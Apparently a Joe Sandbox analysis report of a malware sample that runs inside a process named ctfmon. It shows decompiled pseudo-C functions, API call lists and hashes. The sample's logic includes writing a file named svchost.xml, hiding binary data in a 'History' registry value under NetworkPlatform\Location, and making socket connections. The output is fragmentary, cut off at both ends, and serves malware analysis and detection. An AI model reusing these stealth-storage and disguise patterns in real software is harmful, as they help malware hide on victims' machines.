                                                					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
                                                					if(_t91 == 0xfffffffe) {
                                                						L19:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t76 = _v12;
                                                							_t19 = _t91 + 2; // 0x3
                                                							_t62 = _t91 + _t19 * 2;
                                                							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
                                                							_t63 = _t76 + _t62 * 4;
                                                							_t77 =  *((intOrPtr*)(_t63 + 4));
                                                							_v24 = _t63;
                                                							if( *((intOrPtr*)(_t63 + 4)) == 0) {
                                                								_t78 = _v5;
                                                								goto L12;
                                                							} else {
                                                								_t64 = E0097404E(_t77, _t96);
                                                								_t78 = 1;
                                                								_v5 = 1;
                                                								_t110 = _t64;
                                                								if(_t110 < 0) {
                                                									_v16 = 0;
                                                									L18:
                                                									_push(_t96);
                                                									E00973020(_t91, _t96, _v12);
                                                									goto L19;
                                                								} else {
                                                									if(_t110 <= 0) {
                                                										goto L12;
                                                									} else {
                                                										_t65 = _a4;
                                                										if( *_a4 == 0xe06d7363) {
                                                											_t112 =  *0x9855dc;
                                                											if( *0x9855dc != 0) {
                                                												_t65 = E00983930(_t112, 0x9855dc);
                                                												_t104 = _t104 + 4;
                                                												if(_t65 != 0) {
                                                													_t100 =  *0x9855dc; // 0x971e94
                                                													L0097162B();
                                                													_t65 =  *_t100(_a4, 1);
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                											}
                                                										}
                                                										E0097407E(_t65, _a8, _a4);
                                                										_t67 = _a8;
                                                										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
                                                											E00974097(_t67, _t91, _t96, "/LU5/");
                                                											_t67 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
                                                										E00973020(_t91, _t96, _v12);
                                                										E00974065();
                                                										asm("int3");
                                                										_push(_t96);
                                                										_t98 = _v32;
                                                										_push(_t91);
                                                										_t93 = _v36;
                                                										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
                                                										if(_t98 != 0) {
                                                											if(_t69 == 0) {
                                                												 *_t93 = 0;
                                                											}
                                                											if(_t69 == _t98) {
                                                												_t69 = GetLastError();
                                                												if(_t69 == 0) {
                                                													 *(_t93 + _t98 * 2 - 2) = _t69;
                                                												}
                                                											}
                                                										}
                                                										return _t69;
                                                									}
                                                								}
                                                							}
                                                							goto L29;
                                                							L12:
                                                							_t91 = _t74;
                                                							__eflags = _t74 - 0xfffffffe;
                                                						} while (_t74 != 0xfffffffe);
                                                						__eflags = _t78;
                                                						if(_t78 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                				L29:
                                                			}



































                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0097308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00973105
                                                  • Part of subcall function 00983930: __FindPESection.LIBCMT ref: 00983989
                                                • _ValidateLocalCookies.LIBCMT ref: 00973179
                                                • _ValidateLocalCookies.LIBCMT ref: 009731A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: /LU5/$csm
                                                • API String ID: 1685366865-1617989316
                                                • Opcode ID: e22c94505b8466088fe343b5240f81c543b185777d3e35523b25b9dcc21cf220
                                                • Instruction ID: 6eeab27b4379d537c57eddc72b7a8572588dab393c619b6872ffb27c27406dc9
                                                • Opcode Fuzzy Hash: e22c94505b8466088fe343b5240f81c543b185777d3e35523b25b9dcc21cf220
                                                • Instruction Fuzzy Hash: F841D532E04208ABCF10DF69C894A9EBBB9AF85324F14C165E81C9B352C731DB05DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E009672D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void _v102668;
                                                				long _v102672;
                                                				void* __esi;
                                                				signed int _t16;
                                                				intOrPtr _t26;
                                                				int _t33;
                                                				void* _t39;
                                                				void* _t43;
                                                				intOrPtr _t50;
                                                				void* _t51;
                                                				void* _t55;
                                                				intOrPtr* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                
                                                				E00983CA0();
                                                				_t16 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t16 ^ _t60;
                                                				_t50 = _a4;
                                                				_t39 = __edx;
                                                				_t55 = __ecx;
                                                				E00973440(_t50,  &_v268, 0, 0x104);
                                                				E00965180( &_v268, 0x104, "%s\\svchost.xml", _t55);
                                                				E00973440(_t50,  &_v102668, 0, 0x19000);
                                                				_push(_t50);
                                                				E00965180( &_v102668, 0x19000,  *0x99682c, _t39);
                                                				_t56 =  &_v102668;
                                                				_t43 = _t56 + 1;
                                                				do {
                                                					_t26 =  *_t56;
                                                					_t56 = _t56 + 1;
                                                				} while (_t26 != 0);
                                                				_v102672 = 0;
                                                				_t57 = _t56 - _t43;
                                                				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
                                                				if(_t51 == 0) {
                                                					L5:
                                                					_pop(_t58);
                                                					return E00970A5D(_v8 ^ _t60, _t58);
                                                				} else {
                                                					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
                                                					_push(_t51);
                                                					if(_t33 != 0) {
                                                						CloseHandle();
                                                						_pop(_t59);
                                                						return E00970A5D(_v8 ^ _t60, _t59);
                                                					} else {
                                                						CloseHandle();
                                                						goto L5;
                                                					}
                                                				}
                                                			}






















                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0096737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0096739D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00967878,WIN72K8R2), ref: 009673A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00967878,WIN72K8R2), ref: 009673C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml$/LU5/
                                                • API String ID: 3602564925-2125475700
                                                • Opcode ID: 02d089333694c793398d81bc73673ca1f7fc02a8dbcaae83cad49dd45c3e0a2c
                                                • Instruction ID: 1743e9200650670dd9d79ea87bb2ea46eb68822a16444248fb888a84ad90b385
                                                • Opcode Fuzzy Hash: 02d089333694c793398d81bc73673ca1f7fc02a8dbcaae83cad49dd45c3e0a2c
                                                • Instruction Fuzzy Hash: 13212C72654318BBDB20DB60DC4AFEAB37CDB85704F0040D5F948E7280CA72AAC49B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00964CE0(char* _a8, intOrPtr* _a12) {
                                                				int _v8;
                                                				void* _v12;
                                                				int _v16;
                                                				void* __edi;
                                                				int _t22;
                                                				int _t27;
                                                				intOrPtr* _t32;
                                                
                                                				_v12 = 0;
                                                				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12) == 0) {
                                                					_v16 = 0;
                                                					_v8 = 0;
                                                					if(RegQueryValueExA(_v12, "History", 0,  &_v16, 0,  &_v8) != 0) {
                                                						goto L1;
                                                					} else {
                                                						_t22 = _v8;
                                                						if(_t22 == 0) {
                                                							goto L1;
                                                						} else {
                                                							_t32 = _a12;
                                                							_t30 =  *_t32;
                                                							if( *_t32 < _t22) {
                                                								L8:
                                                								return 0;
                                                							} else {
                                                								E00973440(_t32, _a8, 0, _t30);
                                                								if(RegQueryValueExA(_v12, "History", 0, 0, _a8,  &_v8) != 0) {
                                                									goto L8;
                                                								} else {
                                                									_t27 = _v8;
                                                									if(_t27 == 0) {
                                                										goto L8;
                                                									} else {
                                                										 *_t32 = _t27;
                                                										RegCloseKey(_v12);
                                                										return 1;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}











                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 00964D02
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000800), ref: 00964D34
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000000), ref: 00964D70
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964D86
                                                Strings
                                                • History, xrefs: 00964D2C, 00964D68
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00964CF8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-664128107
                                                • Opcode ID: ae6eff9450d841e77eda781387503d8dba1cae759b409ed73d41282b911e4067
                                                • Instruction ID: 915f30b3fa45065646f2dc98b1cbe854af99e39348d21de5d02abbd25a2ef75e
                                                • Opcode Fuzzy Hash: ae6eff9450d841e77eda781387503d8dba1cae759b409ed73d41282b911e4067
                                                • Instruction Fuzzy Hash: 07111275B40208BBDF109F91EC46FADBBBCEB44B04F1040A5FD08E6290D771AA14EBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID: /LU5/
                                                • API String ID: 3705698054-937868281
                                                • Opcode ID: 764496f250d92c7583a73dc41e578e15c296fe9306045a1575296a5a68406659
                                                • Instruction ID: 7c667974006ca24f3e4c2fe9ee5b24687dda1567e897a3de056e0a6113e03227
                                                • Opcode Fuzzy Hash: 764496f250d92c7583a73dc41e578e15c296fe9306045a1575296a5a68406659
                                                • Instruction Fuzzy Hash: DD21B132A10609EFC711EFA8D809BAEB7B8FF95710F00416AF815AB350EB709A0497D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00964C60(char* _a8, int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				int _t11;
                                                				long _t13;
                                                
                                                				_v8 = 0;
                                                				_v12 = 1;
                                                				_t11 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                                				if(_t11 != 0) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_t13 = RegSetValueExA(_v8, "History", _t11, 3, _a8, _a12);
                                                					_push(_v8);
                                                					if(_t13 == 0) {
                                                						RegCloseKey();
                                                						return 1;
                                                					} else {
                                                						RegCloseKey();
                                                						goto L3;
                                                					}
                                                				}
                                                			}








                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,00000801), ref: 00964C93
                                                • RegSetValueExA.ADVAPI32(00000000,History,00000000,00000003,?,?), ref: 00964CAE
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964CBB
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00964CC7
                                                Strings
                                                • History, xrefs: 00964CA6
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00964C89
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-664128107
                                                • Opcode ID: f19b1c17333184092b29002450dbe26a231a5ae17e0da39ada929296c95b9d3c
                                                • Instruction ID: c1f889e04d97fba5cc2c71721a9f6273a2cbf4ef9174f2627f386fd832f7bf6f
                                                • Opcode Fuzzy Hash: f19b1c17333184092b29002450dbe26a231a5ae17e0da39ada929296c95b9d3c
                                                • Instruction Fuzzy Hash: 25F01274794608BBEF219F90ED06FA97BBCEB04705F110154BE08E5390D6B19A14BB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009765B3,00000002,?,00976553,00000002,0098DED8,0000000C,00976666,00000002), ref: 009765DE
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009765F1
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,009765B3,00000002,?,00976553,00000002,0098DED8,0000000C,00976666,00000002), ref: 00976614
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: /LU5/$CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-4215288899
                                                • Opcode ID: 7841ed4af4261629ee0794faac0c46fe2e9e07802637be51de2b72c69058dd09
                                                • Instruction ID: 455af1f2a3fc2c4b6383b8ef8967b690c7b54134f4ec0ac47f77280ebc4f0b15
                                                • Opcode Fuzzy Hash: 7841ed4af4261629ee0794faac0c46fe2e9e07802637be51de2b72c69058dd09
                                                • Instruction Fuzzy Hash: 9DF0C232A18608FBCB119F90DC4DB9EBFB8EF44715F414064F809A6251CB319D44EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00981654(signed int _a4, void* _a8, unsigned int _a12) {
                                                				signed int _v5;
                                                				char _v6;
                                                				void* _v12;
                                                				unsigned int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				void* _v32;
                                                				long _v36;
                                                				void* _v40;
                                                				long _v44;
                                                				signed int* _t143;
                                                				signed int _t145;
                                                				intOrPtr _t149;
                                                				signed int _t153;
                                                				signed int _t155;
                                                				signed char _t157;
                                                				unsigned int _t158;
                                                				intOrPtr _t162;
                                                				void* _t163;
                                                				signed int _t164;
                                                				signed int _t167;
                                                				long _t168;
                                                				intOrPtr _t175;
                                                				signed int _t176;
                                                				intOrPtr _t178;
                                                				signed int _t180;
                                                				signed int _t184;
                                                				char _t191;
                                                				char* _t192;
                                                				char _t199;
                                                				char* _t200;
                                                				signed char _t211;
                                                				signed int _t213;
                                                				long _t215;
                                                				signed int _t216;
                                                				char _t218;
                                                				signed char _t222;
                                                				signed int _t223;
                                                				unsigned int _t224;
                                                				intOrPtr _t225;
                                                				unsigned int _t229;
                                                				signed int _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed char _t236;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				signed int _t242;
                                                				signed int _t246;
                                                				void* _t248;
                                                				void* _t249;
                                                
                                                				_t213 = _a4;
                                                				if(_t213 != 0xfffffffe) {
                                                					__eflags = _t213;
                                                					if(_t213 < 0) {
                                                						L58:
                                                						_t143 = E00975D30();
                                                						 *_t143 =  *_t143 & 0x00000000;
                                                						__eflags =  *_t143;
                                                						 *((intOrPtr*)(E00975D43())) = 9;
                                                						L59:
                                                						_t145 = E00975C10();
                                                						goto L60;
                                                					}
                                                					__eflags = _t213 -  *0x996680;
                                                					if(_t213 >=  *0x996680) {
                                                						goto L58;
                                                					}
                                                					_v24 = 1;
                                                					_t239 = _t213 >> 6;
                                                					_t235 = (_t213 & 0x0000003f) * 0x30;
                                                					_v20 = _t239;
                                                					_t149 =  *((intOrPtr*)(0x996480 + _t239 * 4));
                                                					_v28 = _t235;
                                                					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                                                					_v5 = _t222;
                                                					__eflags = _t222 & 0x00000001;
                                                					if((_t222 & 0x00000001) == 0) {
                                                						goto L58;
                                                					}
                                                					_t223 = _a12;
                                                					__eflags = _t223 - 0x7fffffff;
                                                					if(_t223 <= 0x7fffffff) {
                                                						__eflags = _t223;
                                                						if(_t223 == 0) {
                                                							L57:
                                                							return 0;
                                                						}
                                                						__eflags = _v5 & 0x00000002;
                                                						if((_v5 & 0x00000002) != 0) {
                                                							goto L57;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							goto L6;
                                                						}
                                                						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                                                						_v5 = _t153;
                                                						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                                                						_t246 = 0;
                                                						_t155 = _t153 - 1;
                                                						__eflags = _t155;
                                                						if(_t155 == 0) {
                                                							_t236 = _v24;
                                                							_t157 =  !_t223;
                                                							__eflags = _t236 & _t157;
                                                							if((_t236 & _t157) != 0) {
                                                								_t158 = 4;
                                                								_t224 = _t223 >> 1;
                                                								_v16 = _t158;
                                                								__eflags = _t224 - _t158;
                                                								if(_t224 >= _t158) {
                                                									_t158 = _t224;
                                                									_v16 = _t224;
                                                								}
                                                								_t246 = E00977882(_t224, _t158);
                                                								E00977848(0);
                                                								E00977848(0);
                                                								_t249 = _t248 + 0xc;
                                                								_v12 = _t246;
                                                								__eflags = _t246;
                                                								if(_t246 != 0) {
                                                									_t162 = E009809B4(_t213, 0, 0, _v24);
                                                									_t225 =  *((intOrPtr*)(0x996480 + _t239 * 4));
                                                									_t248 = _t249 + 0x10;
                                                									_t240 = _v28;
                                                									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                                                									_t163 = _t246;
                                                									 *(_t240 + _t225 + 0x24) = _t236;
                                                									_t235 = _t240;
                                                									_t223 = _v16;
                                                									L21:
                                                									_t241 = 0;
                                                									_v40 = _t163;
                                                									_t215 =  *((intOrPtr*)(0x996480 + _v20 * 4));
                                                									_v36 = _t215;
                                                									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                                                									_t216 = _a4;
                                                									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                                                										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                                                										_v6 = _t218;
                                                										__eflags = _t218 - 0xa;
                                                										_t216 = _a4;
                                                										if(_t218 != 0xa) {
                                                											__eflags = _t223;
                                                											if(_t223 != 0) {
                                                												_t241 = _v24;
                                                												 *_t163 = _v6;
                                                												_t216 = _a4;
                                                												_t232 = _t223 - 1;
                                                												__eflags = _v5;
                                                												_v12 = _t163 + 1;
                                                												_v16 = _t232;
                                                												 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2a)) = 0xa;
                                                												if(_v5 != 0) {
                                                													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2b));
                                                													_v6 = _t191;
                                                													__eflags = _t191 - 0xa;
                                                													if(_t191 != 0xa) {
                                                														__eflags = _t232;
                                                														if(_t232 != 0) {
                                                															_t192 = _v12;
                                                															_t241 = 2;
                                                															 *_t192 = _v6;
                                                															_t216 = _a4;
                                                															_t233 = _t232 - 1;
                                                															_v12 = _t192 + 1;
                                                															_v16 = _t233;
                                                															 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2b)) = 0xa;
                                                															__eflags = _v5 - _v24;
                                                															if(_v5 == _v24) {
                                                																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2c));
                                                																_v6 = _t199;
                                                																__eflags = _t199 - 0xa;
                                                																if(_t199 != 0xa) {
                                                																	__eflags = _t233;
                                                																	if(_t233 != 0) {
                                                																		_t200 = _v12;
                                                																		_t241 = 3;
                                                																		 *_t200 = _v6;
                                                																		_t216 = _a4;
                                                																		_t234 = _t233 - 1;
                                                																		__eflags = _t234;
                                                																		_v12 = _t200 + 1;
                                                																		_v16 = _t234;
                                                																		 *((char*)(_t235 +  *((intOrPtr*)(0x996480 + _v20 * 4)) + 0x2c)) = 0xa;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                									_t164 = E0097F33A(_t216);
                                                									__eflags = _t164;
                                                									if(_t164 == 0) {
                                                										L41:
                                                										_v24 = 0;
                                                										L42:
                                                										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                										__eflags = _t167;
                                                										if(_t167 == 0) {
                                                											L53:
                                                											_t168 = GetLastError();
                                                											_t241 = 5;
                                                											__eflags = _t168 - _t241;
                                                											if(_t168 != _t241) {
                                                												__eflags = _t168 - 0x6d;
                                                												if(_t168 != 0x6d) {
                                                													L37:
                                                													E00975D0D(_t168);
                                                													goto L38;
                                                												}
                                                												_t242 = 0;
                                                												goto L39;
                                                											}
                                                											 *((intOrPtr*)(E00975D43())) = 9;
                                                											 *(E00975D30()) = _t241;
                                                											goto L38;
                                                										}
                                                										_t229 = _a12;
                                                										__eflags = _v36 - _t229;
                                                										if(_v36 > _t229) {
                                                											goto L53;
                                                										}
                                                										_t242 = _t241 + _v36;
                                                										__eflags = _t242;
                                                										L45:
                                                										_t237 = _v28;
                                                										_t175 =  *((intOrPtr*)(0x996480 + _v20 * 4));
                                                										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                                                										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                                                											__eflags = _v5 - 2;
                                                											if(_v5 == 2) {
                                                												__eflags = _v24;
                                                												_push(_t242 >> 1);
                                                												_push(_v40);
                                                												_push(_t216);
                                                												if(_v24 == 0) {
                                                													_t176 = E009811B0();
                                                												} else {
                                                													_t176 = E009814C0();
                                                												}
                                                											} else {
                                                												_t230 = _t229 >> 1;
                                                												__eflags = _t229 >> 1;
                                                												_t176 = E00981370(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                                                											}
                                                											_t242 = _t176;
                                                										}
                                                										goto L39;
                                                									}
                                                									_t231 = _v28;
                                                									_t178 =  *((intOrPtr*)(0x996480 + _v20 * 4));
                                                									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                                                									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                                                										goto L41;
                                                									}
                                                									_t180 = GetConsoleMode(_v32,  &_v44);
                                                									__eflags = _t180;
                                                									if(_t180 == 0) {
                                                										goto L41;
                                                									}
                                                									__eflags = _v5 - 2;
                                                									if(_v5 != 2) {
                                                										goto L42;
                                                									}
                                                									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                									__eflags = _t184;
                                                									if(_t184 != 0) {
                                                										_t229 = _a12;
                                                										_t242 = _t241 + _v36 * 2;
                                                										goto L45;
                                                									}
                                                									_t168 = GetLastError();
                                                									goto L37;
                                                								} else {
                                                									 *((intOrPtr*)(E00975D43())) = 0xc;
                                                									 *(E00975D30()) = 8;
                                                									L38:
                                                									_t242 = _t241 | 0xffffffff;
                                                									__eflags = _t242;
                                                									L39:
                                                									E00977848(_t246);
                                                									return _t242;
                                                								}
                                                							}
                                                							L15:
                                                							 *(E00975D30()) =  *_t206 & _t246;
                                                							 *((intOrPtr*)(E00975D43())) = 0x16;
                                                							E00975C10();
                                                							goto L38;
                                                						}
                                                						__eflags = _t155 != 1;
                                                						if(_t155 != 1) {
                                                							L13:
                                                							_t163 = _a8;
                                                							_v16 = _t223;
                                                							_v12 = _t163;
                                                							goto L21;
                                                						}
                                                						_t211 =  !_t223;
                                                						__eflags = _t211 & 0x00000001;
                                                						if((_t211 & 0x00000001) == 0) {
                                                							goto L15;
                                                						}
                                                						goto L13;
                                                					}
                                                					L6:
                                                					 *(E00975D30()) =  *_t151 & 0x00000000;
                                                					 *((intOrPtr*)(E00975D43())) = 0x16;
                                                					goto L59;
                                                				} else {
                                                					 *(E00975D30()) =  *_t212 & 0x00000000;
                                                					_t145 = E00975D43();
                                                					 *_t145 = 9;
                                                					L60:
                                                					return _t145 | 0xffffffff;
                                                				}
                                                			}


                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d6f4b3e65b2279aba99d5e3fde835f16b524e0081275b8205fdac7b9cb27f72
                                                • Instruction ID: b453d9af46a0c6b5d89175dd905cc2c8d424688135accf53c5c4e20cdb1c3d60
                                                • Opcode Fuzzy Hash: 1d6f4b3e65b2279aba99d5e3fde835f16b524e0081275b8205fdac7b9cb27f72
                                                • Instruction Fuzzy Hash: 70C12375E08249AFDF11EFACD851BADBBBCAF49310F184589E404AB392C3758D42CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00980E01(char* _a4, short* _a8) {
                                                				int _v8;
                                                				void* __ecx;
                                                				short* _t10;
                                                				short* _t14;
                                                				int _t15;
                                                				short* _t16;
                                                				void* _t26;
                                                				int _t27;
                                                				void* _t29;
                                                				short* _t35;
                                                				short* _t39;
                                                				short* _t40;
                                                
                                                				_push(_t29);
                                                				if(_a4 != 0) {
                                                					_t39 = _a8;
                                                					__eflags = _t39;
                                                					if(__eflags != 0) {
                                                						_push(_t26);
                                                						E00977D59(_t29, __eflags);
                                                						asm("sbb ebx, ebx");
                                                						_t35 = 0;
                                                						_t27 = _t26 + 1;
                                                						 *_t39 = 0;
                                                						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                                						_v8 = _t10;
                                                						__eflags = _t10;
                                                						if(_t10 != 0) {
                                                							_t40 = E00977882(_t29, _t10 + _t10);
                                                							__eflags = _t40;
                                                							if(_t40 != 0) {
                                                								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                                                								__eflags = _t15;
                                                								if(_t15 != 0) {
                                                									_t16 = _t40;
                                                									_t40 = 0;
                                                									_t35 = 1;
                                                									__eflags = 1;
                                                									 *_a8 = _t16;
                                                								} else {
                                                									E00975D0D(GetLastError());
                                                								}
                                                							}
                                                							E00977848(_t40);
                                                							_t14 = _t35;
                                                						} else {
                                                							E00975D0D(GetLastError());
                                                							_t14 = 0;
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(E00975D43())) = 0x16;
                                                						E00975C10();
                                                						_t14 = 0;
                                                					}
                                                					return _t14;
                                                				}
                                                				 *((intOrPtr*)(E00975D43())) = 0x16;
                                                				E00975C10();
                                                				return 0;
                                                			}


                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24d9a493267f19da0831874d3d50d3eab1c490a01798bfad6ff9a903232291dd
                                                • Instruction ID: 932c0b1c699d082172303da4570c1d9ca717da2e3a434b8e58fd5bf61deedf02
                                                • Opcode Fuzzy Hash: 24d9a493267f19da0831874d3d50d3eab1c490a01798bfad6ff9a903232291dd
                                                • Instruction Fuzzy Hash: E1110273518605AFCB603F758C09A6B3A9CEFC1320B218A15F81DD7381DAB48C0493A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0097361C(void* __ecx) {
                                                				void* _t5;
                                                				void* _t6;
                                                				void* _t9;
                                                				void* _t15;
                                                				long _t16;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t21;
                                                
                                                				if( *0x990450 != 0xffffffff) {
                                                					_t16 = GetLastError();
                                                					_t20 = E00973E33(__eflags,  *0x990450);
                                                					_t9 = _t15;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = E009778D0(_t9, 1, 0x28);
                                                						__eflags = _t21;
                                                						if(__eflags == 0) {
                                                							L6:
                                                							SetLastError(_t16);
                                                							_t17 = 0;
                                                						} else {
                                                							_t6 = E00973E6D(__eflags,  *0x990450, _t21);
                                                							__eflags = _t6;
                                                							if(_t6 != 0) {
                                                								SetLastError(_t16);
                                                								_t17 = _t21;
                                                								_t21 = 0;
                                                								__eflags = 0;
